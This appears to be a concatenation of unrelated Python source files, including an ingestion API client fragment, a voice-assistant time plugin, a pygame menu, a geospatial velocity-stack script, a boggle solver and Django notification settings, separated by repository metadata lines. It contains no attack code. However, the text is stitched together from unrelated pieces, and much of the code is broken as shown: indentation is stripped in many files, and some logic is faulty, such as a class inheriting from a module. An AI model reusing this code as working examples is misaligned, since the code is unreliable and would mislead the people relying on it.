            batchId : REQUIRED : The batchId referencing the batch created beforehand.
            datasetId : REQUIRED : The datasetId of the dataset the data is ingested into.
            filePath : REQUIRED : the filePath that references the file.
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if filePath is None:
raise Exception("require a filePath value")
if self.loggingEnabled:
self.logger.debug(f"Head File Status batch ID: ({batchId})")
path = f"/batches/{batchId}/datasets/{datasetId}/files/{filePath}"
res = self.connector.headData(self.endpoint + path)
return res
def getPreviewBatchDataset(
self,
batchId: str = None,
datasetId: str = None,
format: str = "json",
delimiter: str = ",",
quote: str = '"',
escape: str = "\\",
charset: str = "utf-8",
header: bool = True,
nrow: int = 5,
) -> dict:
"""
Generates a data preview for the files uploaded to the batch so far. The preview can be generated for all the batch datasets collectively or for the selected datasets.
Arguments:
            batchId : REQUIRED : The batchId referencing the batch created beforehand.
            datasetId : REQUIRED : The datasetId of the dataset the data is ingested into.
format : REQUIRED : Format of the file ('json' default)
delimiter : OPTIONAL : The delimiter to use for parsing column values.
quote : OPTIONAL : The quote value to use while parsing data.
escape : OPTIONAL : The escape character to use while parsing data.
charset : OPTIONAL : The encoding to be used (default utf-8)
header : OPTIONAL : The flag to indicate if the header is supplied in the dataset files.
nrow : OPTIONAL : The number of rows to parse. (default 5) - cannot be 10 or greater
"""
if batchId is None:
raise Exception("require a batchId")
if datasetId is None:
raise Exception("require a dataSetId")
if format is None:
raise Exception("require a format type")
params = {
"delimiter": delimiter,
"quote": quote,
"escape": escape,
"charset": charset,
"header": header,
"nrow": nrow,
}
if self.loggingEnabled:
self.logger.debug(f"getPreviewBatchDataset for dataset ID: ({datasetId})")
path = f"/batches/{batchId}/datasets/{datasetId}/preview"
res = self.connector.getData(self.endpoint + path, params=params)
return res
def streamMessage(
self,
inletId: str = None,
data: dict = None,
synchronousValidation: bool = False,
) -> dict:
"""
Send a dictionary to the connection for streaming ingestion.
Arguments:
inletId : REQUIRED : the connection ID to be used for ingestion
data : REQUIRED : The data that you want to ingest to Platform.
synchronousValidation : OPTIONAL : An optional query parameter, intended for development purposes.
If set to true, it can be used for immediate feedback to determine if the request was successfully sent.
"""
        if inletId is None:
            raise Exception("Require an inletId to be present")
        if data is None or not isinstance(data, dict):
            raise Exception("Require a dictionary to be sent for ingestion")
if self.loggingEnabled:
self.logger.debug(f"Starting Streaming single message")
params = {"synchronousValidation": synchronousValidation}
path = f"/collection/{inletId}"
res = self.connector.postData(
self.endpoint_streaming + path, data=data, params=params
)
return res
def streamMessages(
self,
inletId: str = None,
data: list = None,
synchronousValidation: bool = False,
) -> dict:
"""
        Send a list of dictionaries to the connection for streaming ingestion.
Arguments:
inletId : REQUIRED : the connection ID to be used for ingestion
data : REQUIRED : The list of data that you want to ingest to Platform.
synchronousValidation : OPTIONAL : An optional query parameter, intended for development purposes.
If set to true, it can be used for immediate feedback to determine if the request was successfully sent.
"""
        if inletId is None:
            raise Exception("Require an inletId to be present")
        if data is None or not isinstance(data, list):
            raise Exception("Require a list of dictionaries to be sent for ingestion")
if self.loggingEnabled:
self.logger.debug(f"Starting Streaming multiple messages")
params = {"synchronousValidation": synchronousValidation}
data = {"messages": data}
path = f"/collection/batch/{inletId}"
res = self.connector.postData(
self.endpoint_streaming + path, data=data, params=params
)
return res
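    # Hypothetical usage sketch (the inlet ID and the message shape are assumptions;
    # consult the streaming ingestion documentation for the exact payload):
    # message = {"header": {"schemaRef": {"id": "<schemaId>"}}, "body": {"xdmEntity": {"id": "1"}}}
    # ingestion.streamMessage(inletId="<inletId>", data=message)
    # ingestion.streamMessages(inletId="<inletId>", data=[message, message])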
| 2.5
| 2
|
lessons/JenniferTimePlugin/plugin.py
|
19Leonidas99/JenniferVirtualAssistant
| 1
|
12775594
|
<reponame>19Leonidas99/JenniferVirtualAssistant<gh_stars>1-10
import inflect
import datetime
import semantic.dates
from lessons.base.plugin import JenniferResponsePlugin
from lessons.base.responses import JenniferResponse, JenniferTextResponseSegment
class JenniferTimePlugin(JenniferResponsePlugin):
PRIORITY = 999
VERBOSE_NAME = "Tell the time"
REQUIRES_NETWORK = False
@classmethod
def is_asking_for_time(cls, tags):
"""Tests if asking for time"""
need_these = [
('what', 'WP'), # what as a 'WH-pronoun'
('time', 'NN'), # time as a noun
]
return all([x in tags for x in need_these])
@classmethod
def is_asking_for_date(cls, tags):
"""Tests if asking for date"""
need_these = [
('what', 'WP'), # what as a 'WH-pronoun'
]
answer = all([x in tags for x in need_these])
any_of_these = [
('day', 'NN'),
('date', 'NN'),
]
answer = answer and any([x in tags for x in any_of_these])
return answer
def can_respond(self, **kwargs):
tags = kwargs.get('tags')
return JenniferTimePlugin.is_asking_for_time(tags) or JenniferTimePlugin.is_asking_for_date(tags)
def respond(self, **kwargs):
tags = kwargs.get('tags')
plain_text = kwargs.get('plain_text')
the_time = datetime.datetime.now()
if JenniferTimePlugin.is_asking_for_time(tags):
hour = the_time.strftime('%I').lstrip('0')
return JenniferResponse(self, [
JenniferTextResponseSegment(the_time.strftime('{}:%M %p'.format(hour)))
])
elif JenniferTimePlugin.is_asking_for_date(tags):
# Could be asking "what was the date _____", "what is the date", "what is the date _____", let's parse
possible_dates = semantic.dates.extractDates(plain_text)
def time_format(dt_obj):
inflect_eng = inflect.engine()
date_format = '%A, %B {}, %Y'.format(inflect_eng.ordinal(dt_obj.strftime('%d')))
return dt_obj.strftime(date_format)
# Asking for date today
if not possible_dates:
response = 'Today\'s date is {}'.format(time_format(the_time))
else:
# See if they specified a day?
the_time = possible_dates[0]
response = "{}".format(time_format(the_time))
return JenniferResponse(self, [
JenniferTextResponseSegment(response)
])
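    # Illustrative note (assumption): `tags` is an NLTK-style list of lower-cased
    # (word, POS) tuples, e.g. [('what', 'WP'), ('time', 'NN'), ('is', 'VBZ'), ('it', 'PRP')],
    # which makes is_asking_for_time() return True and routes the request to this plugin.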
| 2.546875
| 3
|
scipy_proceedings/publisher/build_papers.py
|
ScienceStacks/JViz
| 31
|
12775595
|
#!/usr/bin/env python
import os
import sys
import shutil
import subprocess
import conf
import options
from build_paper import build_paper
output_dir = conf.output_dir
build_dir = conf.build_dir
bib_dir = conf.bib_dir
pdf_dir = conf.pdf_dir
toc_conf = conf.toc_conf
proc_conf = conf.proc_conf
dirs = conf.dirs
def paper_stats(paper_id, start):
stats = options.cfg2dict(os.path.join(output_dir, paper_id, 'paper_stats.json'))
# Write page number snippet to be included in the LaTeX output
if 'pages' in stats:
pages = stats['pages']
else:
pages = 1
stop = start + pages - 1
print('"%s" from p. %s to %s' % (paper_id, start, stop))
with open(os.path.join(output_dir, paper_id, 'page_numbers.tex'), 'w') as f:
        f.write(r'\setcounter{page}{%s}' % start)
# Build table of contents
stats.update({'page': {'start': start,
'stop': stop}})
stats.update({'paper_id': paper_id})
return stats, stop
if __name__ == "__main__":
start = 0
toc_entries = []
options.mkdir_p(pdf_dir)
for paper_id in dirs:
build_paper(paper_id)
stats, start = paper_stats(paper_id, start + 1)
toc_entries.append(stats)
build_paper(paper_id)
src_pdf = os.path.join(output_dir, paper_id, 'paper.pdf')
dest_pdf = os.path.join(pdf_dir, paper_id+'.pdf')
shutil.copy(src_pdf, dest_pdf)
command_line = 'cd '+pdf_dir+' ; pdfannotextractor '+paper_id+'.pdf'
run = subprocess.Popen(command_line, shell=True, stdout=subprocess.PIPE)
out, err = run.communicate()
toc = {'toc': toc_entries}
options.dict2cfg(toc, toc_conf)
| 2.296875
| 2
|
botbot_plugins/decorators.py
|
metabrainz/brainzbot-plugins
| 4
|
12775596
|
def listens_to_mentions(regex):
"""
Decorator to add function and rule to routing table
Returns Line that triggered the function.
"""
def decorator(func):
func.route_rule = ('mentions', regex)
return func
return decorator
def listens_to_all(regex):
"""
Decorator to add function and rule to routing table
Returns Line that triggered the function.
"""
def decorator(func):
func.route_rule = ('messages', regex)
return func
return decorator
def listens_to_command(cmd):
"""
Decorator to listen for command with arguments return as list
Returns Line that triggered the function
as well as List of arguments not including the command.
    Can be used as a compatibility layer for simpler porting of plugins from other
bots
"""
def decorator(func):
func.route_rule = ('commands', cmd)
return func
return decorator
def listens_to_regex_command(cmd, regex):
"""
Decorator to listen for command with arguments checked by regex
Returns Line that triggered the function.
The best of both worlds
"""
def decorator(func):
func.route_rule = ('regex_commands', (cmd, regex))
return func
return decorator
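# Illustrative usage sketch (handler name, signature, and body are hypothetical):
# @listens_to_command('!echo')
# def echo(line, args):
#     return ' '.join(args)
# The decorator only attaches ('commands', '!echo') as `echo.route_rule`; the bot's router
# is expected to dispatch matching lines to the function.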
| 3.515625
| 4
|
MCS/mapred/combiner.py
|
Wiki-fan/MIPT-all
| 0
|
12775597
|
<filename>MCS/mapred/combiner.py
#!/usr/bin/env python3
import sys
inside = 0
total = 0
for line in sys.stdin:
arr = line.strip().split(' ')
x, y = float(arr[0]), float(arr[1])
print(x, y, file=sys.stderr)
total += 1
if x**2+y**2<=1:
inside += 1
print('Combiner output %.15f'%(inside/total*4), file=sys.stderr)
print("%.15f"%(inside/total*4))
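# Input sketch: each stdin line is one sampled point written as "x y", e.g. "0.31 0.77";
# the fraction of points falling inside the unit circle, multiplied by 4, estimates pi.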
| 2.40625
| 2
|
sp_mp.py
|
NikhilMunna/chinese-checkers-
| 2
|
12775598
|
import pygame, time
import virtual_start_page
import two_players
def CreateGameWindow(width, height):
pygame.display.set_caption("Checkers !")
gamewindow = pygame.display.set_mode((width, height))
return gamewindow
def WriteText(text, text_pos_x, text_pos_y, text_size):
text_font = pygame.font.SysFont(None, text_size)
text_render = text_font.render(text, True, Black)
gameWindow.blit(text_render, (text_pos_x, text_pos_y))
class CreateButton():
def layout(self,button):
pygame.draw.rect(gameWindow, button[4], (button[0], button[1], button[2], button[3]))
def text(self, button, space_x, space_y):
WriteText(button[5], button[0] + space_x, button[1] + space_y, button[6])
def Animate(self, button, actual_color, animate_color):
mouse_x, mouse_y = pygame.mouse.get_pos()
if mouse_x >= button[0] and mouse_y >= button[1] and mouse_x <= button[0] + button[2] and mouse_y <= button[1] + button[3]:
button[7] += 1
if button[7] == 1:
button[6] += 1
button[4] = animate_color
else:
button[4] = actual_color
button[6] = 30
button[7] = 0
pygame.init()
#Colors:
White = (255,255,255)
LightWhite = (200,200,200)
Black = (0,0,0)
Gray = (128,128,128)
LightGreen = (0,200,0)
BrightGreen = (0,255,0)
LightBlue = (0,0,200)
BrightBlue = (0,0,255)
#Dimensions:
gameWindow_width = 680
gameWindow_height = 680
#-------------Lists of properties of Buttons------
twoPlayers = [gameWindow_width/4 - 60, gameWindow_height/3 + 60 , 200, 50, LightGreen, "Two Players", 30, 0]
team_play = [gameWindow_width/4 + 270 - 80, gameWindow_height/3 + 60, 200, 50, LightGreen, "Team Play", 30, 0]
back = [10, gameWindow_height - 80, 160, 50, Black, "Back", 30, 0]
gameWindow = CreateGameWindow(gameWindow_width, gameWindow_height)
#pygame.display.set_caption("Checkers")
#gameWindow = pygame.display.set_mode((gameWindow_width,gameWindow_height))
def Run_Game():
End = False
while not End:
gameWindow.fill(LightWhite)
WriteText("PLAY", 210, 100, 150)
createButton = CreateButton()
createButton.layout(twoPlayers)
createButton.text(twoPlayers, 36, 16)
createButton.Animate(twoPlayers, LightGreen, BrightGreen)
createButton.layout(team_play)
createButton.text(team_play, 45, 16)
createButton.Animate(team_play, LightGreen, BrightGreen)
createButton.layout(back)
createButton.text(back, 55, 16)
createButton.Animate(back, LightWhite, Gray)
#On_Click_Back_Button(back)
for key in pygame.event.get():
            if key.type == pygame.KEYDOWN:
                if key.key == pygame.K_ESCAPE:
                    End = True
                    pygame.quit()
                    return
            if key.type == pygame.QUIT:
                pygame.quit()
                return
mouse_x, mouse_y = pygame.mouse.get_pos()
if key.type == pygame.MOUSEBUTTONDOWN:
if mouse_x >= back[0] and mouse_y >= back[1] and mouse_x <= back[0] + back[2] and mouse_y <= back[1] + back[3]:
return
if mouse_x >= twoPlayers[0] and mouse_y >= twoPlayers[1] and mouse_x <= twoPlayers[0] + twoPlayers[2] \
and mouse_y <= twoPlayers[1] + twoPlayers[3]:
two_players.StartSinglePlayer(0, 0, 0)
pygame.display.update()
#Run_Game()
#pygame.quit()
| 2.921875
| 3
|
main/customtrainer.py
|
safdark/behavioral-cloning
| 0
|
12775599
|
'''
Created on Dec 11, 2016
@author: safdar
'''
import basetrainer
# NOTE: subclassing the module object itself raises a TypeError; `BaseTrainer` below is an
# assumed class name and should be adjusted to whatever basetrainer actually exports.
class MyClass(basetrainer.BaseTrainer):
'''
classdocs
'''
def __init__(self, params):
'''
Constructor
'''
| 2.78125
| 3
|
dkr-py310/docker-student-portal-310/course_files/begin_advanced/py_files_5.py
|
pbarton666/virtual_classroom
| 0
|
12775600
|
<reponame>pbarton666/virtual_classroom
#py_files_5.py
import pickle as pickle
from junk import JUNK
pickle_file="dill"
#make a couple objects
obj = [ [1, 2, 3],
[4, 5, 5],
[7, 8, 9]
]
obj1="<NAME>"
obj2=set([33,43,53])
#another (better) way:
to_pickle={'obj' : obj,
'obj1': obj1,
'obj2': obj2,
'junk': JUNK
}
with open(pickle_file, 'wb') as f:
pickle.dump(to_pickle,f)
to_pickle=None
with open(pickle_file, 'rb') as f:
to_pickle=pickle.load(f)
for k, v in to_pickle.items():
print(k,v)
| 3.203125
| 3
|
prepStack-EHU.py
|
bryanvriel/Gld-timeseries
| 0
|
12775601
|
<gh_stars>0
#!/usr/bin/env python3
import numpy as np
# import matplotlib.pyplot as plt
from scipy.ndimage.interpolation import map_coordinates
from sklearn.linear_model import RANSACRegressor
import datetime
from tqdm import tqdm
import glob
import gdal
import h5py
import sys
import os
def main():
# Traverse data path
dpath = '/home/ehultee/data/nsidc0481_MEASURES_greenland_V01/Ecoast-66.50N'
dates = []
vx_files = []; vy_files = []
ex_files = []; ey_files = []
for root, dirs, files in os.walk(dpath):
for fname in files:
if not fname.endswith('v1.2.meta'):
continue
# Get the dates for the igram pair
first_date, second_date, nominal_dt = parseMeta(os.path.join(root, fname))
# Compute middle date
dt = 0.5 * (second_date - first_date).total_seconds()
mid_date = first_date + datetime.timedelta(seconds=dt)
mid_date += datetime.timedelta(seconds=nominal_dt)
dates.append(mid_date)
# Find the data files
vx_file = glob.glob(os.path.join(root, '*vx*.tif'))[0]
vy_file = glob.glob(os.path.join(root, '*vy*.tif'))[0]
ex_file = glob.glob(os.path.join(root, '*ex*.tif'))[0]
ey_file = glob.glob(os.path.join(root, '*ey*.tif'))[0]
# Append the filenames
vx_files.append(vx_file)
vy_files.append(vy_file)
ex_files.append(ex_file)
ey_files.append(ey_file)
# Create array for dates and files
dates = np.array(dates)
N_dates = len(dates)
vx_files = np.array(vx_files, dtype='S')
vy_files = np.array(vy_files, dtype='S')
ex_files = np.array(ex_files, dtype='S')
ey_files = np.array(ey_files, dtype='S')
# Construct array of decimal year
tdec = np.zeros(N_dates)
for i in tqdm(range(N_dates)):
date = dates[i]
year_start = datetime.datetime(date.year, 1, 1)
if date.year % 4 == 0:
ndays = 366.0
else:
ndays = 365.0
tdec[i] = date.year + (date - year_start).total_seconds() / (ndays * 86400.0)
# Sort the dates and files
indsort = np.argsort(tdec)
tdec = tdec[indsort]
vx_files = vx_files[indsort]
vy_files = vy_files[indsort]
ex_files = ex_files[indsort]
ey_files = ey_files[indsort]
# Read first file to get dimensions and geo transform
ds = gdal.Open(vx_files[0], gdal.GA_ReadOnly)
Ny, Nx = ds.RasterYSize, ds.RasterXSize
x_start, dx, _, y_start, _, dy = ds.GetGeoTransform()
ds = None
# Get DEM
# dem = load_interpolated_dem()
# Allocate arrays for velocities and errors
vx = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
vy = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
ex = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
ey = np.zeros((N_dates, Ny, Nx), dtype=np.float32)
heading = np.zeros(N_dates)
counts = np.zeros((Ny, Nx))
# Loop over rasters
for i in tqdm(range(len(vx_files))):
# Load vx
ds = gdal.Open(vx_files[i], gdal.GA_ReadOnly)
vx_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Load vy
ds = gdal.Open(vy_files[i], gdal.GA_ReadOnly)
vy_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Load vx
ds = gdal.Open(ex_files[i], gdal.GA_ReadOnly)
ex_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Load vy
ds = gdal.Open(ey_files[i], gdal.GA_ReadOnly)
ey_dat = ds.GetRasterBand(1).ReadAsArray()
ds = None
# Compute heading
try:
heading[i] = compute_heading(vx_dat, skip=15)
except ValueError:
heading[i] = np.nan
continue
# Mask out bad values
mask = (np.abs(vx_dat) > 1e6) + (ex_dat < 0.0) + (ex_dat > 100.0)
vx_dat[mask] = np.nan
vy_dat[mask] = np.nan
ex_dat[mask] = np.nan
ey_dat[mask] = np.nan
# Scale and save
vx[i,:,:] = 1.0e-3 * vx_dat
vy[i,:,:] = 1.0e-3 * vy_dat
ex[i,:,:] = 1.0e-3 * ex_dat
ey[i,:,:] = 1.0e-3 * ey_dat
# Update counters
counts[np.invert(mask)] += 1
# Only keep good headings
mask = np.isfinite(heading)
vx, vy, ex, ey = vx[mask], vy[mask], ex[mask], ey[mask]
heading = heading[mask]
tdec = tdec[mask]
vx_files = vx_files[mask]
vy_files = vy_files[mask]
ex_files = ex_files[mask]
ey_files = ey_files[mask]
N_dates = len(heading)
# Create arrays for coordinates
x = x_start + dx * np.arange(Nx)
y = y_start + dy * np.arange(Ny)
X, Y = np.meshgrid(x, y)
# Initialize stack directory
if not os.path.isdir('Stack'):
os.mkdir('Stack')
# Convert errors into weights
wx = 1.0 / (25.0 * np.sqrt(ex))
wy = 1.0 / (25.0 * np.sqrt(ey))
del ex, ey
# Spatially subset
islice = slice(120, 580)
jslice = slice(240, 878)
vx = vx[:,islice,jslice]
vy = vy[:,islice,jslice]
wx = wx[:,islice,jslice]
wy = wy[:,islice,jslice]
# dem = dem[islice,jslice]
X = X[islice,jslice]
Y = Y[islice,jslice]
Ny, Nx = X.shape
# Create stack for Vx data
with h5py.File('Stack/vx.h5', 'w') as fid:
chunks = (1, 128, 128)
fid.create_dataset('igram', (N_dates, Ny, Nx), dtype='f', data=vx, chunks=chunks)
fid.create_dataset('weights', (N_dates, Ny, Nx), dtype='f', data=wx, chunks=chunks)
fid['tdec'] = tdec
fid['x'] = X
fid['y'] = Y
# fid['z'] = dem
fid['chunk_shape'] = list(chunks)
fid['vx_files'] = vx_files
fid['vy_files'] = vy_files
fid['heading'] = heading
# Create stack for Vy data
with h5py.File('Stack/vy.h5', 'w') as fid:
chunks = (1, 128, 128)
fid.create_dataset('igram', (N_dates, Ny, Nx), dtype='f', data=vy, chunks=chunks)
fid.create_dataset('weights', (N_dates, Ny, Nx), dtype='f', data=wy, chunks=chunks)
fid['tdec'] = tdec
fid['x'] = X
fid['y'] = Y
# fid['z'] = dem
fid['chunk_shape'] = list(chunks)
fid['vx_files'] = vx_files
fid['vy_files'] = vy_files
fid['heading'] = heading
def parseMeta(filename):
"""
Parse the metadata for dates.
"""
with open(filename, 'r') as fid:
for line in fid:
if line.startswith('First Image Date'):
dstr = line.strip().split('=')[-1].strip()
first_date = datetime.datetime.strptime(dstr, '%b:%d:%Y')
elif line.startswith('Second Image Date'):
dstr = line.strip().split('=')[-1].strip()
second_date = datetime.datetime.strptime(dstr, '%b:%d:%Y')
elif line.startswith('Product Center Latitude'):
vstr = line.strip().split('=')[-1].strip()
clat = float(vstr)
elif line.startswith('Product Center Longitude'):
vstr = line.strip().split('=')[-1].strip()
clon = float(vstr)
elif line.startswith('Nominal Time'):
tstr = line.strip().split('=')[-1].strip()
hh, mm, ss = [int(val) for val in tstr.split(':')]
nominal_dt = hh * 3600.0 + mm * 60.0 + ss
return first_date, second_date, nominal_dt
# def load_interpolated_dem():
#
# # Get hdr information from random velocity tif file
# vhdr = load_gdal('/data0/briel/measures/nsidc0481_MEASURES_greenland_V01/Wcoast-69.10N/TSX_Sep-11-2012_Sep-22-2012_20-41-24/TSX_W69.10N_11Sep12_22Sep12_20-41-24_ex_v1.2.tif', hdr_only=True)
#
# # Load DEM
# dem, dhdr = load_gdal('arcticdem_crop.dem')
#
# # Velocity grid meshgrid coordinates
# x = vhdr.x0 + vhdr.dx * np.arange(vhdr.nx)
# y = vhdr.y0 + vhdr.dy * np.arange(vhdr.ny)
# X, Y = np.meshgrid(x, y)
#
# # Interpolate DEM to velocity grid
# dem = interpolate_raster(dem, dhdr, X.ravel(), Y.ravel())
# dem = dem.reshape(vhdr.ny, vhdr.nx)
# return dem
def load_gdal(filename, hdr_only=False):
hdr = GenericClass()
dset = gdal.Open(filename, gdal.GA_ReadOnly)
hdr.x0, hdr.dx, _, hdr.y0, _, hdr.dy = dset.GetGeoTransform()
hdr.ny = dset.RasterYSize
hdr.nx = dset.RasterXSize
if hdr_only:
return hdr
else:
d = dset.GetRasterBand(1).ReadAsArray()
return d, hdr
def interpolate_raster(data, hdr, x, y):
row = (y - hdr.y0) / hdr.dy
col = (x - hdr.x0) / hdr.dx
coords = np.vstack((row, col))
values = map_coordinates(data, coords, order=3, prefilter=False)
return values
def compute_heading(v, skip=10):
dy = -100.0
dx = 100.0
ny, nx = v.shape
# Get left edge
ycoords = dy * np.arange(0, ny, skip)
xcoords = np.full(ycoords.shape, np.nan)
for cnt, i in enumerate(range(0, ny, skip)):
good_ind = (v[i,:] > -20000).nonzero()[0]
if len(good_ind) < 10:
continue
xcoords[cnt] = dx * good_ind[-1]
# Solve linear
mask = np.isfinite(xcoords)
ycoords, xcoords = ycoords[mask], xcoords[mask]
X = np.column_stack((ycoords, np.ones_like(ycoords)))
solver = RANSACRegressor().fit(X, xcoords)
fit = solver.predict(X)
# Compute heading
slope = solver.estimator_.coef_[0]
heading = np.degrees(np.arctan(slope))
return heading
class GenericClass:
pass
if __name__ == '__main__':
main()
# end of file
| 2.171875
| 2
|
strings/boggle.py
|
santoshmano/pybricks
| 0
|
12775602
|
class TrieNode():
def __init__(self, letter=''):
self.children = {}
self.is_word = False
def lookup_letter(self, c):
if c in self.children:
return True, self.children[c].is_word
else:
return False, False
class Trie():
def __init__(self):
self.root = TrieNode()
def add(self, word):
cur = self.root
for letter in word:
if letter not in cur.children:
cur.children[letter] = TrieNode()
cur = cur.children[letter]
cur.is_word = True
    def lookup(self, word):
        cur = self.root
        for letter in word:
            if letter not in cur.children:
                return False
            cur = cur.children[letter]
        # TrieNode stores no index, so report whether the full word is present
        return cur.is_word
def build_prefix(dictionary):
trie = Trie()
for word in dictionary:
trie.add(word)
return trie
def find_words(dictionary, board):
result = []
prefix = build_prefix(dictionary)
boggle(board, prefix, result)
return result
def boggle(board, prefix, result):
#print(board, len(board[0]), len(board))
visited = [[False for _ in range(len(board[0]))] for _ in range(len(board))]
for r in range(0, len(board)):
for c in range(0, len(board[0])):
str = []
_boggle(board, visited, prefix.root, result, r, c, str)
def _is_valid(visited, i, j):
if (i < 0) or (i >= len(visited)) or \
(j < 0) or (j >= len(visited[0])) or \
visited[i][j] == True:
return False
return True
def _boggle(board, visited, node, result, row, col, str):
print(node.children)
print(visited)
c = board[row][col]
present, is_word = node.lookup_letter(c)
if present == False:
return
str.append(c)
if is_word == True :
result.append("".join(str))
print(result)
visited[row][col] = True
for i in row-1, row, row+1:
for j in col-1, col, col+1:
if _is_valid(visited, i, j):
_boggle(board, visited, node.children[c], result, i, j, str)
str.pop()
visited[row][col] = False
dictionary = ["geek", "geeks", "boy"]
board = [["g", "b", "o"],
["e", "y", "s"],
["s", "e", "k"]]
res = find_words(dictionary, board)
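# Illustrative note: with the dictionary and board above, the search should find all three
# words, i.e. res is expected to be ['geek', 'geeks', 'boy'] (in scan order).
# print(res)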
| 3.9375
| 4
|
weightin/apps/app.py
|
thomasLensicaen/weightin
| 0
|
12775603
|
<reponame>thomasLensicaen/weightin<filename>weightin/apps/app.py
import pymongo
from config import DbConfig
import logging
from common.logtool import log_debug, create_logger
class AppBase:
db_name = "appbase"
collections_list = ["appbase"]
def __init__(self, dbconfig: DbConfig):
self.dbconfig = dbconfig
self.mongo_client = pymongo.MongoClient(dbconfig.host, dbconfig.port)
server_info = self.mongo_client.server_info()
self.db = self.mongo_client[self.db_name]
self.collections = dict()
for col_name in self.collections_list:
self.collections[col_name] = self.db[col_name]
print(self.mongo_client.list_database_names())
        if self.db_name not in self.mongo_client.list_database_names():
logging.info("{} Database is not created inside MongoDb, maybe no content has been pushed yet".format(self.db_name))
| 2.546875
| 3
|
apps/notifications/conf.py
|
sotkonstantinidis/testcircle
| 3
|
12775604
|
<reponame>sotkonstantinidis/testcircle
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
from django.conf import settings # noqa
from appconf import AppConf
class NotificationsConf(AppConf):
CREATE = 1
DELETE = 2
CHANGE_STATUS = 3
ADD_MEMBER = 4
REMOVE_MEMBER = 5
EDIT_CONTENT = 6
FINISH_EDITING = 7
ACTIONS = (
(CREATE, _('created questionnaire')),
(DELETE, _('deleted questionnaire')),
(CHANGE_STATUS, _('changed status')),
(ADD_MEMBER, _('invited member')),
(REMOVE_MEMBER, _('removed member')),
(EDIT_CONTENT, _('edited content')),
(FINISH_EDITING, _('editor finished'))
)
ACTION_ICON = {
CREATE: 'icon-plus',
DELETE: 'icon-minus',
'status-reject': 'icon-rewind',
'status-approve': 'icon-forward',
ADD_MEMBER: 'icon-member-add',
REMOVE_MEMBER: 'icon-member-remove',
EDIT_CONTENT: 'icon-pencil',
FINISH_EDITING: 'icon-edit-approve',
}
MAIL_SUBJECTS = {
'edited': _('This practice has been edited'),
'submitted': _('This practice has been submitted'),
'reviewed': _('This practice has been approved and is awaiting final review before it can be published'),
'published': _('Congratulations, this practice has been published!'),
'deleted': _('This practice has been deleted'),
'rejected_submitted': _('This practice has been rejected and needs revision'),
'rejected_reviewed': _('This practice has been rejected and needs revision'),
'compiler_added': _('You are a compiler'),
'compiler_removed': _('You have been removed as a compiler'),
'editor_added': _('You are an editor'),
'editor_removed': _('You have been removed as an editor'),
'reviewer_added': _('You are a reviewer'),
'reviewer_removed': _('You have been removed as a reviewer'),
'publisher_added': _('You are a publisher'),
'publisher_removed': _('You have been removed as a publisher'),
}
# Mapping of user permissions and allowed questionnaire statuses
QUESTIONNAIRE_STATUS_PERMISSIONS = {
'questionnaire.submit_questionnaire': settings.QUESTIONNAIRE_DRAFT,
'questionnaire.review_questionnaire': settings.QUESTIONNAIRE_SUBMITTED,
'questionnaire.publish_questionnaire': settings.QUESTIONNAIRE_REVIEWED
}
QUESTIONNAIRE_MEMBERSHIP_PERMISSIONS = {
settings.QUESTIONNAIRE_COMPILER: [settings.QUESTIONNAIRE_DRAFT],
settings.QUESTIONNAIRE_EDITOR: [],
settings.QUESTIONNAIRE_REVIEWER: [settings.QUESTIONNAIRE_SUBMITTED],
settings.QUESTIONNAIRE_PUBLISHER: [settings.QUESTIONNAIRE_REVIEWED],
settings.QUESTIONNAIRE_SECRETARIAT: [settings.QUESTIONNAIRE_SUBMITTED, settings.QUESTIONNAIRE_REVIEWED],
settings.ACCOUNTS_UNCCD_ROLE_NAME: [],
settings.QUESTIONNAIRE_LANDUSER: [],
settings.QUESTIONNAIRE_RESOURCEPERSON: []
}
# All actions that should be listed on 'my slm data' -> notifications.
# Some actions are depending on the role (i.e. compilers see all edits).
USER_PROFILE_ACTIONS = [
CREATE, DELETE, CHANGE_STATUS, ADD_MEMBER, REMOVE_MEMBER, FINISH_EDITING
]
# All actions that should trigger an email
EMAIL_PREFERENCES = [
CREATE, DELETE, CHANGE_STATUS, ADD_MEMBER, REMOVE_MEMBER, FINISH_EDITING
]
# email subscriptions
NO_MAILS = 'none'
TODO_MAILS = 'todo'
ALL_MAILS = 'all'
EMAIL_SUBSCRIPTIONS = (
(NO_MAILS, _('No emails at all')),
(TODO_MAILS, _('Only emails that I need to work on')),
(ALL_MAILS, _('All emails')),
)
TEASER_PAGINATE_BY = 5
LIST_PAGINATE_BY = 10
SALT = settings.BASE_DIR
| 1.859375
| 2
|
text_cryptography/tests/log.py
|
Joshua-Booth/text-cryptography
| 0
|
12775605
|
<gh_stars>0
import logging
# Create a logger called 'Tester'
test_logger = logging.getLogger('Tester')
test_logger.setLevel(logging.DEBUG)
# Create a file handler which logs even debug messages
file_handler = logging.FileHandler('test.log')
file_handler.setLevel(logging.DEBUG)
# Create a console handler with a higher log level
console_handler = logging.StreamHandler()
console_handler.setLevel(logging.ERROR)
# Create a formatter and add it to the handler
formatter_format = "%(asctime)s - %(name)s - %(levelname)s - " + \
"%(funcName)s - Line: %(lineno)s - %(message)s"
formatter = logging.Formatter(formatter_format)
file_handler.setFormatter(formatter)
console_handler.setFormatter(formatter)
# Add the handlers to the logger
test_logger.addHandler(file_handler)
test_logger.addHandler(console_handler)
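# Usage sketch (the import path depends on how the test suite is packaged):
# from tests.log import test_logger
# test_logger.debug("starting encryption round-trip test")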
| 3.09375
| 3
|
Python/Udemy/biblioteca.py
|
ccpn1988/Python
| 0
|
12775606
|
<filename>Python/Udemy/biblioteca.py
import os
import tkinter as tk
root = tk.Tk()
canvas1 = tk.Canvas(root, width=300, height=350, bg='lightsteelblue2', relief='raised')
canvas1.pack()
label1 = tk.Label(root, text='Upgrade PIP', bg='lightsteelblue2')
label1.config(font=('helvetica', 20))
canvas1.create_window(150, 80, window=label1)
def upgradePIP():
    os.system('start cmd /k python.exe -m pip install --upgrade pip')
button1 = tk.Button(text='Upgrade PIP', command=upgradePIP, bg='green', fg='white', font=('helvetica', 12, 'bold'))
canvas1.create_window(150, 180, window=button1)
root.mainloop()
| 3.671875
| 4
|
calculate_mupots_integrate.py
|
3dpose/3D-Multi-Person-Pose
| 91
|
12775607
|
